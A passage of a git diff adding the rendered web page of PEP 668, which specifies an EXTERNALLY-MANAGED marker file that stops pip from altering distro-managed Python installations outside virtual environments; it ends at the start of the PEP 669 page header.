To shadow an installed Python package is to cause some other +package to be preferred for imports without removing any files +from the shadowed package. This requires multiple entries on +sys.path: if package A 2.0 installs module a.py in one +sys.path entry, and package A 1.0 installs module a.py in +a later sys.path entry, then import a returns the module +from the former, and we say that A 2.0 shadows A 1.0.
+
+
+
+

Motivation

+

Thanks to Python’s immense popularity, software distros (by which we +mean Linux and other OS distros as well as overlay distros like +Homebrew and MacPorts) generally ship Python for two purposes: as a +software package to be used in its own right by end users, and as a +language dependency for other software in the distro.

+

For example, Fedora and Debian (and their downstream distros, as well +as many others) ship a /usr/bin/python3 binary which provides the +python3 command available to end users as well as the +#!/usr/bin/python3 shebang for Python-language software included +in the distro. Because there are no official binary releases of Python +for Linux/UNIX, almost all Python end users on these OSes use the +Python interpreter built and shipped with their distro.

+

The python3 executable available to the users of the distro and +the python3 executable available as a dependency for other +software in the distro are typically the same binary. This means that +if an end user installs a Python package using a tool like pip +outside the context of a virtual environment, that package is visible +to Python-language software shipped by the distro. If the +newly-installed package (or one of its dependencies) is a newer, +backwards-incompatible version of a package that was installed through +the distro, it may break software shipped by the distro.

+

This may pose a critical problem for the integrity of distros, which +often have package-management tools that are themselves written in +Python. For example, it’s possible to unintentionally break Fedora’s +dnf command with a pip install command, making it hard to +recover.

+

This applies both to system-wide installs (sudo pip install) as +well as user home directory installs (pip install --user), since +packages in either location show up on the sys.path of +/usr/bin/python3.

+

There is a worse problem with system-wide installs: if you attempt to +recover from this situation with sudo pip uninstall, you may end +up removing packages that are shipped by the system’s package manager. +In fact, this can even happen if you simply upgrade a package - pip +will try to remove the old version of the package, as shipped by the +OS. At this point it may not be possible to recover the system to a +consistent state using just the software remaining on the system.

+

Over the past many years, a consensus has emerged that the best way to +install Python libraries or applications (when not using a distro’s +package) is to use a virtual environment. This approach was +popularized by the PyPA virtualenv project, and a simple version of +that approach is now available in the Python standard library as +venv. Installing a Python package into a virtualenv prevents it +from being visible to the unqualified /usr/bin/python3 interpreter +and prevents breaking system software.

+

In some cases, however, it’s useful and intentional to install a +Python package from outside of the distro that influences the behavior +of distro-shipped commands. This is common in the case of software +like Sphinx or Ansible which have a mechanism for writing +Python-language extensions. A user may want to use their distro’s +version of the base software (for reasons of paid support or security +updates) but install a small extension from PyPI, and they’d want that +extension to be importable by the software in their base system.

+

While this continues to carry the risk of installing a newer version +of a dependency than the operating system expects or otherwise +negatively affecting the behavior of an application, it does not need +to carry the risk of removing files from the operating system. A tool +like pip should be able to install packages in some directory on the +default sys.path, if specifically requested, without deleting +files owned by the system’s package manager.

+

Therefore, this PEP proposes two things.

+

First, it proposes a way for distributors of a Python interpreter to +mark that interpreter as having its packages managed by means external +to Python, such that Python-specific tools like pip should not +change the installed packages in the interpreter’s global sys.path +in any way (add, upgrade/downgrade, or remove) unless specifically +overridden. It also provides a means for the distributor to indicate +how to use a virtual environment as an alternative.

+

This is an opt-in mechanism: by default, the Python interpreter +compiled from upstream sources will not be so marked, and so running +pip install with a self-compiled interpreter, or with a distro +that has not explicitly marked its interpreter, will work as it always +has worked.

+

Second, it sets the rule that when installing packages to an +interpreter’s global context (either to an unmarked interpreter, or if +overriding the marking), Python-specific package managers should +modify or delete files only within the directories of the sysconfig +scheme in which they would create files. This permits a distributor +of a Python interpreter to set up two directories, one for its own +managed packages, and one for unmanaged packages installed by the end +user, and ensure that installing unmanaged packages will not delete +(or overwrite) files owned by the external package manager.

+
+
+

Rationale

+

As described in detail in the next section, the first behavior change +involves creating a marker file named EXTERNALLY-MANAGED, whose +presence indicates that non-virtual-environment package installations +are managed by some means external to Python, such as a distro’s +package manager. This file is specified to live in the stdlib +directory in the default sysconfig scheme, which marks the +interpreter / installation as a whole, not a particular location on +sys.path. The reason for this is that, as identified above, there +are two related problems that risk breaking an externally-managed +Python: you can install an incompatible new version of a package +system-wide (e.g., with sudo pip install), and you can install one +in your user account alone, but in a location that is on the standard +Python command’s sys.path (e.g., with pip install --user). If +the marker file were in the system-wide site-packages directory, +it would not clearly apply to the second case. The Alternatives +section has further discussion of possible locations.

+

The second behavior change takes advantage of the existing +sysconfig setup in distros that have already encountered this +class of problem, and specifically addresses the problem of a +Python-specific package manager deleting or overwriting files that are +owned by an external package manager.

+
+

Use cases

+

The changed behavior in this PEP is intended to “do the right thing” +for as many use cases as possible. In this section, we consider the +changes specified by this PEP for several representative use cases / +contexts. Specifically, we ask about the two behaviors that could be +changed by this PEP:

+
    +
  1. Will a Python-specific installer tool like pip install permit +installations by default, after implementation of this PEP?
  2. +
  3. If you do run such a tool, should it be willing to delete packages +shipped by the external (non-Python-specific) package manager for +that context, such as a distro package manager?
  4. +
+

(For simplicity, this section discusses pip as the Python-specific +installer tool, though the analysis should apply equally to any other +Python-specific package management tool.)

+

This table summarizes the use cases discussed in detail below:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CaseDescriptionpip install permittedDeleting externally-installed packages permitted
1Unpatched CPythonCurrently yes; stays yesCurrently yes; stays yes
2Distro /usr/bin/python3Currently yes; becomes no +(assuming the distro +adds a marker file)Currently yes (except on Debian); becomes no
3Distro Python in venvCurrently yes; stays yesThere are no externally-installed packages
4Distro Python in venv +with --system-site-packagesCurrently yes; stays yesCurrently no; stays no
5Distro Python in DockerCurrently yes; becomes no +(assuming the distro +adds a marker file)Currently yes; becomes no
6Conda environmentCurrently yes; stays yesCurrently yes; stays yes
7Dev-facing distroCurrently yes; becomes no +(assuming they add a +marker file)Currently often yes; becomes no +(assuming they configure sysconfig as needed)
8Distro building packagesCurrently yes; can stay yesCurrently yes; becomes no
9PYTHONHOME copied from +a distro Python stdlibCurrently yes; becomes noCurrently yes; becomes no
10PYTHONHOME copied from +upstream Python stdlibCurrently yes; stays yesCurrently yes; stays yes
+

In more detail, the use cases above are:

+
    +
  1. A standard unpatched CPython, without any special configuration of +or patches to sysconfig and without a marker file. This PEP +does not change its behavior.

    Such a CPython should (regardless of this PEP) not be installed in +a way that overlaps any distro-installed Python on the same system. +For instance, on an OS that ships Python in /usr/bin, you +should not install a custom CPython built with ./configure +--prefix=/usr, or it will overwrite some files from the distro +and the distro will eventually overwrite some files from your +installation. Instead, your installation should be in a separate +directory (perhaps /usr/local, /opt, or your home +directory).

    +

    Therefore, we can assume that such a CPython has its own stdlib +directory and its own sysconfig schemes that do not overlap any +distro-installed Python. So any OS-installed packages are not +visible or relevant here.

    +

    If there is a concept of “externally-installed” packages in this +case, it’s something outside the OS and generally managed by +whoever built and installed this CPython. Because the installer +chose not to add a marker file or modify sysconfig schemes, +they’re choosing the current behavior, and pip install can +remove any packages available in this CPython.

    +
  2. +
  3. A distro’s /usr/bin/python3, either when running pip +install as root or pip install --user, following our +Recommendations for distros.

    These recommendations include shipping a marker file in the +stdlib directory, to prevent pip install by default, and +placing distro-shipped packages in a location other than the +default sysconfig scheme, so that pip as root does not +write to that location.

    +

    Many distros (including Debian, Fedora, and their derivatives) are +already doing the latter.

    +

    On Debian and derivatives, pip install does not currently +delete distro-installed packages, because Debian carries a patch +to pip to prevent this. So, for those distros, this PEP is not a +behavior change; it simply standardizes that behavior in a way that +is no longer Debian-specific and can be included into upstream pip.

    +

    (We have seen user reports of externally-installed packages being +deleted on Debian or a derivative. We suspect this is because the +user has previously run sudo pip install --upgrade pip and +therefore now has a version of /usr/bin/pip without the Debian +patch; standardizing this behavior in upstream package installers +would address this problem.)

    +
  4. +
  5. A distro Python when used inside a virtual environment (either from +venv or virtualenv).

    Inside a virtual environment, all packages are owned by that +environment. Even when pip, setuptools, etc. are installed +into the environment, they are and should be managed by tools +specific to that environment; they are not system-managed.

    +
  6. +
  7. A distro Python when used inside a virtual environment with +--system-site-packages. This is like the previous case, but +worth calling out explicitly, because anything on the global +sys.path is visible.

    Currently, the answer to “Will pip delete externally-installed +packages” is no, because pip has a special case for running in a +virtual environment and attempting to delete packages outside it. +After this PEP, the answer remains no, but the reasoning becomes +more general: system site packages will be outside any of the +sysconfig schemes used for package management in the +environment.

    +
  8. +
  9. A distro Python when used in a single-application container image +(e.g., a Docker container). In this use case, the risk of breaking +system software is lower, since generally only a single application +runs in the container, and the impact is lower, since you can +rebuild the container and you don’t have to struggle to recover a +running machine. There are also a large number of existing +Dockerfiles with an unqualified RUN pip install ... statement, +etc., and it would be good not to break those. So, builders of base +container images may want to ensure that the marker file is not +present, even if the underlying OS ships one by default.

    There is a small behavior change: currently, pip run as root +will delete externally-installed packages, but after this PEP it +will not. We don’t propose a way to override this. However, since +the base image is generally minimal, there shouldn’t be much of a +use case for simply uninstalling packages (especially without using +the distro’s own tools). The common case is when pip wants to +upgrade a package, which previously would have deleted the old +version (except on Debian). After this change, the old version will +still be on disk, but pip will still shadow externally-installed +packages, and we believe this to be sufficient for this not to be a +breaking change in practice - a Python import statement will +still get you the newly-installed package.

    +

    If it becomes necessary to have a way to do this, we suggest that +the distro should document a way for the installer tool to access +the sysconfig scheme used by the distro itself. See the +Recommendations for distros section for more discussion.

    +

    It is the view of the authors of this PEP that it’s still a good +idea to use virtual environments with distro-installed Python +interpreters, even in single-application container images. Even +though they run a single application, that application may run +commands from the OS that are implemented in Python, and if you’ve +installed or upgraded the distro-shipped Python packages using +Python-specific tools, those commands may break.

    +
  10. +
  11. Conda specifically supports the use of non-conda tools like pip +to install software not available in the Conda repositories. In +this context, Conda acts as the external package manager / distro +and pip as the Python-specific one.

    In some sense, this is similar to the first case, since Conda +provides its own installation of the Python interpreter.

    +

    We don’t believe this PEP requires any changes to Conda, and +versions of pip that have implemented the changes in this PEP will +continue to behave as they currently do inside Conda environments. +(That said, it may be worth considering whether to use separate +sysconfig schemes for pip-installed and Conda-installed +software, for the same reasons it’s a good idea for other distros.)

    +
  12. +
  13. By a “developer-facing distro,” we mean a specific type of distro +where direct users of Python or other languages in the distro are +expected or encouraged to make changes to the distro itself if they +wish to add libraries. Common examples include private “monorepos” +at software development companies, where a single repository builds +both third-party and in-house software, and the direct users of the +distro’s Python interpreter are generally software developers +writing said in-house software. User-level package managers like +Nixpkgs may also count, because they encourage users of Nix who +are Python developers to package their software for Nix.

    In these cases, the distro may want to respond to an attempted +pip install with guidance encouraging use of the distro’s own +facilities for adding new packages, along with a link to +documentation.

    +

    If the distro supports/encourages creating a virtual environment +from the distro’s Python interpreter, there may also be custom +instructions for how to properly set up a virtual environment (as +for example Nixpkgs does).

    +
  14. +
  15. When building distro Python packages for a distro Python (case 2), +it may be useful to have pip install be usable as part of the +distro’s package build process. (Consider, for instance, building a +python-xyz RPM by using pip install . inside an sdist / +source tarball for xyz.) The distro may also want to use a more +targeted but still Python-specific installation tool such as +installer.

    For this case, the build process will need to find some way to +suppress the marker file to allow pip install to work, and will +probably need to point the Python-specific tool at the distro’s +sysconfig scheme instead of the shipped default. See the +Recommendations for distros section for more discussion on how +to implement this.

    +

    As a result of this PEP, pip will no longer be able to remove +packages already on the system. However, this behavior change is +fine because a package build process should not (and generally +cannot) include instructions to delete some other files on the +system; it can only package up its own files.

    +
  16. +
  17. A distro Python used with PYTHONHOME to set up an alternative +Python environment (as opposed to a virtual environment), where +PYTHONHOME is set to some directory copied directly from the +distro Python (e.g., cp -a /usr/lib/python3.x pyhome/lib).

    Assuming there are no modifications, then the behavior is just like +the underlying distro Python (case 2). So there are behavior +changes - you can no longer pip install by default, and if you +override it, it will no longer delete externally-installed packages +(i.e., Python packages that were copied from the OS and live in the +OS-managed sys.path entry).

    +

    This behavior change seems to be defensible, in that if your +PYTHONHOME is a straight copy of the distro’s Python, it should +behave like the distro’s Python.

    +
  18. +
  19. A distro Python (or any Python interpreter) used with a +PYTHONHOME taken from a compatible unmodified upstream Python.

    Because the behavior changes in this PEP are keyed off of files in +the standard library (the marker file in stdlib and the +behavior of the sysconfig module), the behavior is just like +an unmodified upstream CPython (case 1).

    +
  20. +
+
+
+
+

Specification

+
+

Marking an interpreter as using an external package manager

+

Before a Python-specific package installer (that is, a tool such as +pip - not an external tool such as apt) installs a package into a +certain Python context, it should make the following checks by +default:

+
    +
  1. Is it running outside of a virtual environment? It can determine +this by whether sys.prefix == sys.base_prefix (but see +Backwards Compatibility).
  2. +
  3. Is there an EXTERNALLY-MANAGED file in the directory identified +by sysconfig.get_path("stdlib", +sysconfig.get_default_scheme())?
  4. +
+

If both of these conditions are true, the installer should exit with +an error message indicating that package installation into this Python +interpreter’s directory are disabled outside of a virtual environment.

+

The installer should have a way for the user to override these rules, +such as a command-line flag --break-system-packages. This option +should not be enabled by default and should carry some connotation +that its use is risky.

+

The EXTERNALLY-MANAGED file is an INI-style metadata file intended +to be parsable by the standard library configparser module. If the +file can be parsed by +configparser.ConfigParser(interpolation=None) using the UTF-8 +encoding, and it contains a section [externally-managed], then the +installer should look for an error message specified in the file and +output it as part of its error. If the first element of the tuple +returned by locale.getlocale(locale.LC_MESSAGES), i.e., the +language code, is not None, it should look for the error message +as the value of a key named Error- followed by the language code. +If that key does not exist, and if the language code contains +underscore or hyphen, it should look for a key named Error- +followed by the portion of the language code before the underscore or +hyphen. If it cannot find either of those, or if the language code is +None, it should look for a key simply named Error.

+

If the installer cannot find an error message in the file (either +because the file cannot be parsed or because no suitable error key +exists), then the installer should just use a pre-defined error +message of its own, which should suggest that the user create a +virtual environment to install packages.

+

Software distributors who have a non-Python-specific package manager +that manages libraries in the sys.path of their Python package +should, in general, ship a EXTERNALLY-MANAGED file in their +standard library directory. For instance, Debian may ship a file in +/usr/lib/python3.9/EXTERNALLY-MANAGED consisting of something like

+
[externally-managed]
+Error=To install Python packages system-wide, try apt install
+ python3-xyz, where xyz is the package you are trying to
+ install.
+
+ If you wish to install a non-Debian-packaged Python package,
+ create a virtual environment using python3 -m venv path/to/venv.
+ Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
+ sure you have python3-full installed.
+
+ If you wish to install a non-Debian packaged Python application,
+ it may be easiest to use pipx install xyz, which will manage a
+ virtual environment for you. Make sure you have pipx installed.
+
+ See /usr/share/doc/python3.9/README.venv for more information.
+
+
+

which provides useful and distro-relevant information +to a user trying to install a package. Optionally, +translations can be provided in the same file:

+
Error-de_DE=Wenn ist das Nunstück git und Slotermeyer?
+
+ Ja! Beiherhund das Oder die Virtualenvironment gersput!
+
+
+

In certain contexts, such as single-application container images that +aren’t updated after creation, a distributor may choose not to ship an +EXTERNALLY-MANAGED file, so that users can install whatever they +like (as they can today) without having to manually override this +rule.

+
+
+

Writing to only the target sysconfig scheme

+

Usually, a Python package installer installs to directories in a +scheme returned by the sysconfig standard library package. +Ordinarily, this is the scheme returned by +sysconfig.get_default_scheme(), but based on configuration (e.g. +pip install --user), it may use a different scheme.

+

Whenever the installer is installing to a sysconfig scheme, this +PEP specifies that the installer should never modify or delete files +outside of that scheme. For instance, if it’s upgrading a package, and +the package is already installed in a directory outside that scheme +(perhaps in a directory from another scheme), it should leave the +existing files alone.

+

If the installer does end up shadowing an existing installation during +an upgrade, we recommend that it produces a warning at the end of its +run.

+

If the installer is installing to a location outside of a +sysconfig scheme (e.g., pip install --target), then this +subsection does not apply.

+
+
+
+

Recommendations for distros

+

This section is non-normative. It provides best practices we believe +distros should follow unless they have a specific reason otherwise.

+
+

Mark the installation as externally managed

+

Distros should create an EXTERNALLY-MANAGED file in their +stdlib directory.

+
+
+

Guide users towards virtual environments

+

The file should contain a useful and distro-relevant error message +indicating both how to install system-wide packages via the distro’s +package manager and how to set up a virtual environment. If your +distro is often used by users in a state where the python3 command +is available (and especially where pip or get-pip is +available) but python3 -m venv does not work, the message should +indicate clearly how to make python3 -m venv work properly.

+

Consider packaging pipx, a tool for installing Python-language +applications, and suggesting it in the error. pipx automatically +creates a virtual environment for that application alone, which is a +much better default for end users who want to install some +Python-language software (which isn’t available in the distro) but are +not themselves Python users. Packaging pipx in the distro avoids the +irony of instructing users to pip install --user +--break-system-packages pipx to avoid breaking system packages. +Consider arranging things so your distro’s package / environment for +Python for end users (e.g., python3 on Fedora or python3-full +on Debian) depends on pipx.

+
+
+

Keep the marker file in container images

+

Distros that produce official images for single-application containers +(e.g., Docker container images) should keep the +EXTERNALLY-MANAGED file, preferably in a way that makes it not +go away if a user of that image installs package updates inside +their image (think RUN apt-get dist-upgrade).

+
+
+

Create separate distro and local directories

+

Distros should place two separate paths on the system interpreter’s +sys.path, one for distro-installed packages and one for packages +installed by the local system administrator, and configure +sysconfig.get_default_scheme() to point at the latter path. This +ensures that tools like pip will not modify distro-installed packages. +The path for the local system administrator should come before the +distro path on sys.path so that local installs take preference +over distro packages.

+

For example, Fedora and Debian (and their derivatives) both implement +this split by using /usr/local for locally-installed packages and +/usr for distro-installed packages. Fedora uses +/usr/local/lib/python3.x/site-packages vs. +/usr/lib/python3.x/site-packages. (Debian uses +/usr/local/lib/python3/dist-packages vs. +/usr/lib/python3/dist-packages as an additional layer of +separation from a locally-compiled Python interpreter: if you build +and install upstream CPython in /usr/local/bin, it will look at +/usr/local/lib/python3/site-packages, and Debian wishes to make +sure that packages installed via the locally-built interpreter don’t +show up on sys.path for the distro interpreter.)

+

Note that the /usr/local vs. /usr split is analogous to how +the PATH environment variable typically includes +/usr/local/bin:/usr/bin and non-distro software installs to +/usr/local by default. This split is recommended by the +Filesystem Hierarchy Standard.

+

There are two ways you could do this. One is, if you are building and +packaging Python libraries directly (e.g., your packaging helpers +unpack a PEP 517-built wheel or call setup.py install), arrange +for those tools to use a directory that is not in a sysconfig +scheme but is still on sys.path.

+

The other is to arrange for the default sysconfig scheme to change +when running inside a package build versus when running on an +installed system. The sysconfig customization hooks from +bpo-43976 should make this easy (once accepted and implemented): +make your packaging tool set an +environment variable or some other detectable configuration, and +define a get_preferred_schemes function to return a different +scheme when called from inside a package build. Then you can use pip +install as part of your distro packaging.

+

We propose adding a --scheme=... option to instruct pip to run +against a specific scheme. (See Implementation Notes below for how +pip currently determines schemes.) Once that’s available, for local +testing and possibly for actual packaging, you would be able to run +something like pip install --scheme=posix_distro to explicitly +install a package into your distro’s location (bypassing +get_preferred_schemes). One could also, if absolutely needed, use +pip uninstall --scheme=posix_distro to use pip to remove packages +from the system-managed directory, which addresses the (hopefully +theoretical) regression in use case 5 in Rationale.

+

To install packages with pip, you would also need to either suppress +the EXTERNALLY-MANAGED marker file to allow pip to run or to +override it on the command line. You may want to use the same means +for suppressing the marker file in build chroots as you do in +container images.

+

The advantage of setting these up to be automatic (suppressing the +marker file in your build environment and having +get_preferred_schemes automatically return your distro’s scheme) +is that an unadorned pip install will work inside a package build, +which generally means that an unmodified upstream build script that +happens to internally call pip install will do the right thing. +You can, of course, just ensure that your packaging process always +calls pip install --scheme=posix_distro --break-system-packages, +which would work too.

+

The best approach here depends a lot on your distro’s conventions and +mechanisms for packaging.

+

Similarly, the sysconfig paths that are not for importable Python +code - that is, include, platinclude, scripts, and +data - should also have two variants, one for use by +distro-packaged software and one for use for locally-installed +software, and the distro should be set up such that both are usable. +For instance, a typical FHS-compliant distro will use +/usr/local/include for the default scheme’s include and +/usr/include for distro-packaged headers and place both on the +compiler’s search path, and it will use /usr/local/bin for the +default scheme’s scripts and /usr/bin for distro-packaged +entry points and place both on $PATH.

+
+
+
+

Backwards Compatibility

+

All of these mechanisms are proposed for new distro releases and new +versions of tools like pip only.

+

In particular, we strongly recommend that distros with a concept of +major versions only add the marker file or change sysconfig +schemes in a new major version; otherwise there is a risk that, on an +existing system, software installed via a Python-specific package +manager now becomes unmanageable (without an override option). For a +rolling-release distro, if possible, only add the marker file or +change sysconfig schemes in a new Python minor version.

+

One particular backwards-compatibility difficulty for package +installation tools is likely to be managing environments created by +old versions of virtualenv which have the latest version of the +tool installed. A “virtual environment” now has a fairly precise +definition: it uses the pyvenv.cfg mechanism, which causes +sys.base_prefix != sys.prefix. It is possible, however, that a +user may have an old virtual environment created by an older version +of virtualenv; as of this writing, pip supports Python 3.6 +onwards, which is in turn supported by virtualenv 15.1.0 onwards, +so this scenario is possible. In older versions of virtualenv, the +mechanism is instead to set a new attribute, sys.real_prefix, and +it does not use the standard library support for virtual environments, +so sys.base_prefix is the same as sys.prefix. So the logic for +robustly detecting a virtual environment is something like:

+
def is_virtual_environment():
+    return sys.base_prefix != sys.prefix or hasattr(sys, "real_prefix")
+
+
+
+
+

Security Implications

+

The purpose of this feature is not to implement a security boundary; +it is to discourage well-intended changes from unexpectedly breaking a +user’s environment. That is to say, the reason this PEP restricts +pip install outside a virtual environment is not that it’s a +security risk to be able to do so; it’s that “There should be one– +and preferably only one –obvious way to do it,” and that way should +be using a virtual environment. pip install outside a virtual +environment is rather too obvious for what is almost always the wrong +way to do it.

+

If there is a case where a user should not be able to sudo pip +install or pip install --user and add files to sys.path for +security reasons, that needs to be implemented either via access +control rules on what files the user can write to or an explicitly +secured sys.path for the program in question. Neither of the +mechanisms in this PEP should be interpreted as a way to address such +a scenario.

+

For those reasons, an attempted install with a marker file present is +not a security incident, and there is no need to raise an auditing +event for it. If the calling user legitimately has access to sudo +pip install or pip install --user, they can accomplish the same +installation entirely outside of Python; if they do not legitimately +have such access, that’s a problem outside the scope of this PEP.

+

The marker file itself is located in the standard library directory, +which is a trusted location (i.e., anyone who can write to the marker +file used by a particular installer could, presumably, run arbitrary +code inside the installer). Therefore, there is generally no need to +filter out terminal escape sequences or other potentially-malicious +content in the error message.

+
+
+

Alternatives

+

There are a number of similar proposals we considered that this PEP +rejects or defers, largely to preserve the behavior in the +case-by-case analysis in Rationale.

+
+

Marker file

+

Should the marker file be in sys.path, marking a particular +directory as not to be written to by a Python-specific package +manager? This would help with the second problem addressed by this PEP +(not overwriting deleting distro-owned files) but not the first +(incompatible installs). A directory-specific marker in +/usr/lib/python3.x/site-packages would not discourage +installations into either /usr/local/lib/python3.x/site-packages +or ~/.local/lib/python3.x/site-packages, both of which are on +sys.path for /usr/bin/python3. In other words, the marker file +should not be interpreted as marking a single directory as +externally managed (even though it happens to be in a directory on +sys.path); it marks the entire Python installation as externally +managed.

+

Another variant of the above: should the marker file be in +sys.path, where if it can be found in any directory in +sys.path, it marks the installation as externally managed? An +apparent advantage of this approach is that it automatically disables +itself in virtual environments. Unfortunately, This has the wrong +behavior with a --system-site-packages virtual environment, where +the system-wide sys.path is visible but package installations are +allowed. (It could work if the rule of exempting virtual environments +is preserved, but that seems to have no advantage over the current +scheme.)

+

Should the marker just be a new attribute of a sysconfig scheme? +There is some conceptual cleanliness to this, except that it’s hard to +override. We want to make it easy for container images, package build +environments, etc. to suppress the marker file. A file that you can +remove is easy; code in sysconfig is much harder to modify.

+

Should the file be in /etc? No, because again, it refers to a +specific Python installation. A user who installs their own Python may +well want to install packages within the global context of that +interpreter.

+

Should the configuration setting be in pip.conf or +distutils.cfg? Apart from the above objections about marking an +installation, this mechanism isn’t specific to either of those tools. +(It seems reasonable for pip to also implement a configuration flag +for users to prevent themselves from performing accidental +non-virtual-environment installs in any Python installation, but that +is outside the scope of this PEP.)

+

Should the file be TOML? TOML is gaining popularity for packaging (see +e.g. PEP 517) but does not yet have an implementation in the standard +library. Strictly speaking, this isn’t a blocker - distros need only +write the file, not read it, so they don’t need a TOML library (the +file will probably be written by hand, regardless of format), and +packaging tools likely have a TOML reader already. However, the INI +format is currently used for various other forms of packaging metadata +(e.g., pydistutils.cfg and setup.cfg), meets our needs, and is +parsable by the standard library, and the pip maintainers expressed a +preference to avoid using TOML for this yet.

+

Should the file be email.message-style? While this format is also +used for packaging metadata (e.g. sdist and wheel metadata) and is +also parsable by the standard library, it doesn’t handle multi-line +entries quite as clearly, and that is our primary use case.

+

Should the marker file be executable Python code that evaluates +whether installation should be allowed or not? Apart from the concerns +above about having the file in sys.path, we have a concern that +making it executable is committing to too powerful of an API and risks +making behavior harder to understand. (Note that the +get_default_scheme hook of bpo-43976 is in fact executable, but +that code needs to be supplied when the interpreter builds; it isn’t +intended to be supplied post-build.)

+

When overriding the marker, should a Python-specific package manager +be disallowed from shadowing a package installed by the external +package manager (i.e., installing modules of the same name)? This +would minimize the risk of breaking system software, but it’s not +clear it’s worth the additional user experience complexity. There are +legitimate use cases for shadowing system packages, and an additional +command-line option to permit it would be more confusing. Meanwhile, +not passing that option wouldn’t eliminate the risk of breaking system +software, which may be relying on a try: import xyz failing, +finding a limited set of entry points, etc. Communicating this +distinction seems difficult. We think it’s a good idea for +Python-specific package managers to print a warning if they shadow a +package, but we think it’s not worth disabling it by default.

+

Why not use the INSTALLER file from PEP 376 to determine who +installed a package and whether it can be removed? First, it’s +specific to a particular package (it’s in the package’s dist-info +directory), so like some of the alternatives above, it doesn’t provide +information on an entire environment and whether package installations +are permissible. PEP 627 also updates PEP 376 to prevent programmatic +use of INSTALLER, specifying that the file is “to be used for +informational purposes only. […] Our goal is supporting +interoperating tools, and basing any action on which tool happened to +install a package runs counter to that goal.” Finally, as PEP 627 +envisions, there are legitimate use cases for one tool knowing how to +handle packages installed by another tool; for instance, conda can +safely remove a package installed by pip into a Conda environment.

+

Why does the specification give no means for disabling package +installations inside a virtual environment? We can’t see a +particularly strong use case for it (at least not one related to the +purposes of this PEP). If you need it, it’s simple enough to pip +uninstall pip inside that environment, which should discourage at +least unintentional changes to the environment (and this specification +makes no provision to disable intentional changes, since after all +the marker file can be easily removed).

+
+
+

System Python

+

Shouldn’t distro software just run with the distro site-packages +directory alone on sys.path and ignore the local system +administrator’s site-packages as well as the user-specific one? +This is a worthwhile idea, and various versions of it have been +circulating for a while under the name of “system Python” or “platform +Python” (with a separate “user Python” for end users writing Python or +installing Python software separate from the system). However, it’s +much more involved of a change. First, it would be a +backwards-incompatible change. As mentioned in the Motivation +section, there are valid use cases for running distro-installed Python +applications like Sphinx or Ansible with locally-installed Python +libraries available on their sys.path. A wholesale switch to +ignoring local packages would break these use cases, and a distro +would have to make a case-by-case analysis of whether an application +ought to see locally-installed libraries or not.

+

Furthermore, Fedora attempted this change and reverted it, finding, +ironically, that their implementation of the change broke their +package manager. Given that experience, there are clearly details to +be worked out before distros can reliably implement that approach, and +a PEP recommending it would be premature.

+

This PEP is intended to be a complete and self-contained change that +is independent of a distributor’s decision for or against “system +Python” or similar proposals. It is not incompatible with a distro +implementing “system Python” in the future, and even though both +proposals address the same class of problems, there are still +arguments in favor of implementing something like “system Python” even +after implementing this PEP. At the same time, though, this PEP +specifically tries to make a more targeted and minimal change, such +that it can be implemented by distributors who don’t expect to adopt +“system Python” (or don’t expect to implement it immediately). The +changes in this PEP stand on their own merits and are not an +intermediate step for some future proposal. This PEP reduces (but does +not eliminate) the risk of breaking system software while minimizing +(but not completely avoiding) breaking changes, which should therefore +be much easier to implement than the full “system Python” idea, which +comes with the downsides mentioned above.

+

We expect that the guidance in this PEP - that users should use +virtual environments whenever possible and that distros should have +separate sys.path directories for distro-managed and +locally-managed modules - should make further experiments easier in +the future. These may include distributing wholly separate “system” +and “user” Python interpreters, running system software out of a +distro-owned virtual environment or PYTHONHOME (but shipping a +single interpreter), or modifying the entry points for certain +software (such as the distro’s package manager) to use a sys.path +that only sees distro-managed directories. Those ideas themselves, +however, remain outside the scope of this PEP.

+
+
+
+

Implementation Notes

+

This section is non-normative and contains notes relevant to both the +specification and potential implementations.

+

Currently, pip does not directly expose a way to choose a target +sysconfig scheme, but it has three ways of looking up schemes when +installing:

+
+
pip install
Calls sysconfig.get_default_scheme(), which is usually (in +upstream CPython and most current distros) the same as +get_preferred_scheme('prefix').
+
pip install --prefix=/some/path
Calls sysconfig.get_preferred_scheme('prefix').
+
pip install --user
Calls sysconfig.get_preferred_scheme('user').
+
+

Finally, pip install --target=/some/path writes directly to +/some/path without looking up any schemes.

+

Debian currently carries a patch to change the default install +location inside a virtual environment, using a few heuristics +(including checking for the VIRTUAL_ENV environment variable), +largely so that the directory used in a virtual environment remains +site-packages and not dist-packages. This does not +particularly affect this proposal, because the implementation of that +patch does not actually change the default sysconfig scheme, and +notably does not change the result of +sysconfig.get_path("stdlib").

+

Fedora currently carries a patch to change the default install +location when not running inside rpmbuild, which they use to +implement the two-system-wide-directories approach. This is +conceptually the sort of hook envisioned by bpo-43976, except +implemented as a code patch to distutils instead of as a changed +sysconfig scheme.

+

The implementation of is_virtual_environment above, as well as the +logic to load the EXTERNALLY-MANAGED file and find the error +message from it, may as well get added to the standard library +(sys and sysconfig, respectively), to centralize their +implementations, but they don’t need to be added yet.

+
+
+

References

+

For additional background on these problems and previous attempts to +solve them, see Debian bug 771794 “pip silently removes/updates +system provided python packages” from 2014, Fedora’s 2018 article +Making sudo pip safe about pointing sudo pip at /usr/local +(which acknowledges that the changes still do not make sudo pip +completely safe), pip issues 5605 (“Disable upgrades to existing +python modules which were not installed via pip”) and 5722 (“pip +should respect /usr/local”) from 2018, and the post-PyCon US 2019 +discussion thread Playing nice with external package managers.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0668.rst

+

Last modified: 2024-05-17 01:32:43 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0669/index.html b/pep-0669/index.html new file mode 100644 index 00000000000..ffda7f6642d --- /dev/null +++ b/pep-0669/index.html @@ -0,0 +1,742 @@ + + + + + + + + PEP 669 – Low Impact Monitoring for CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 669 – Low Impact Monitoring for CPython

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Aug-2021
+
Python-Version:
+
3.12
+
Post-History:
+
07-Dec-2021, +10-Jan-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

